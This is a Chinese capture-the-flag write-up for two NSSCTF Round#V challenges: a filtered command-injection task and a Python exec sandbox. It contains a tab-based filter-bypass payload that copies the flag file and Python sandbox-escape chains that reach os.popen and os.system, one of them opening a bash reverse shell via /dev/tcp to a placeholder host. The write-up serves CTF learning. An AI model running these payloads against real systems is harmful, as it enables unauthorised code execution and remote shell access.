NSSCTF Round#V

PYRCE

思路还是不够灵活QwQ

这题没有过滤\t $ & () , . : ?还有除了u,n的字母

就可以操作了

空格用%09(tab)绕过

/cd$(pwd)绕过

然后可以cpflag中的内容到app.py

payload = "cp%09(cd%09..&&cd%09..&&cd%09..&&cd%09..&&cd%09..&&cd%09..&&echo%09(pwd)flag)%09app.py"

但我不是很懂为什么明明app.py已经被覆盖了路由什么的还在。。。

官方WP是mkdir static然后把/flag复制到里面去

naive_calculator

import dis, sys

def pr(x, end='\n'):
    sys.stdout.write(str(x) + end)
    sys.stdout.flush()

pr("========================================")
pr("|           NAIVE CALCULATOR           |")
pr("----------------------------------------")
pr("|          Too simple, sometimes naive.|")
pr("========================================")
pr("")
pr("Sample input: a = 1 + 2")
pr("Sample output: a = 3")
pr("")

def check_code_object(code_info):
    for info_line in code_info:
        if 'code object' in info_line:
            pr("DON'T BE PUSSY")
            exit()

def check_names(code_info):
    for info_line in code_info[code_info.index('Names:'):]:
        if '1:' in info_line:
            pr('HAIYAA')
            exit()

if __name__ == '__main__':
    expr = input('> ')
    code_info = dis.code_info(expr).split('\n')

    print(dis.code_info(expr))

    check_code_object(code_info)

    if 'Names:' in code_info:
        check_names(code_info)

    exec(expr, {'__builtins__': None}, res:={})
    for LHS, RHS in res.items():
        pr(f"[!] {LHS} = {RHS}")

这里的dis模块用于把python代码转成字节码

代码逻辑大概是动态执行expr,并且只能有一个命名空间(比如a.b且a和b不同的话就是两个命名空间),而且这个命名空间不能是匿名函数

而且不能用__buildins__

考虑用__getattribute__来做变量名,且可以用__getattribute__来获取属性值

__getattribute__ = (None).__getattribute__('__class__');

后面就跟SSTI比较像?

贴两个别人的payload

expr = ''

expr += "__getattribute__ = (None).__getattribute__('__class__');"

expr += "__getattribute__ = __getattribute__.__getattribute__(__getattribute__,'__base__');"
expr += "__getattribute__ = __getattribute__.__getattribute__(__getattribute__,'__subclasses__')();"

expr += "__getattribute__ = __getattribute__[132];"

expr += "__getattribute__ = __getattribute__.__getattribute__(__getattribute__,'__init__');"

expr += "__getattribute__ = __getattribute__.__getattribute__('__globals__');"
expr += "__getattribute__ = __getattribute__['popen']('bash -c \"bash -i >& /dev/tcp/ip/port 0>&1\"');"

print(expr)
__getattribute__ = (None).__getattribute__('__class__');
__getattribute__ = __getattribute__.__getattribute__(__getattribute__, '__base__');
__getattribute__.__getattribute__(__getattribute__.__getattribute__(__getattribute__.__getattribute__(__getattribute__, '__subclasses__')()[84](), 'load_module') ('os'), 'system') ('sh')


参考资料

https://blog.csdn.net/Little_jcak/article/details/126594381


告别纷扰,去寻找生活的宝藏。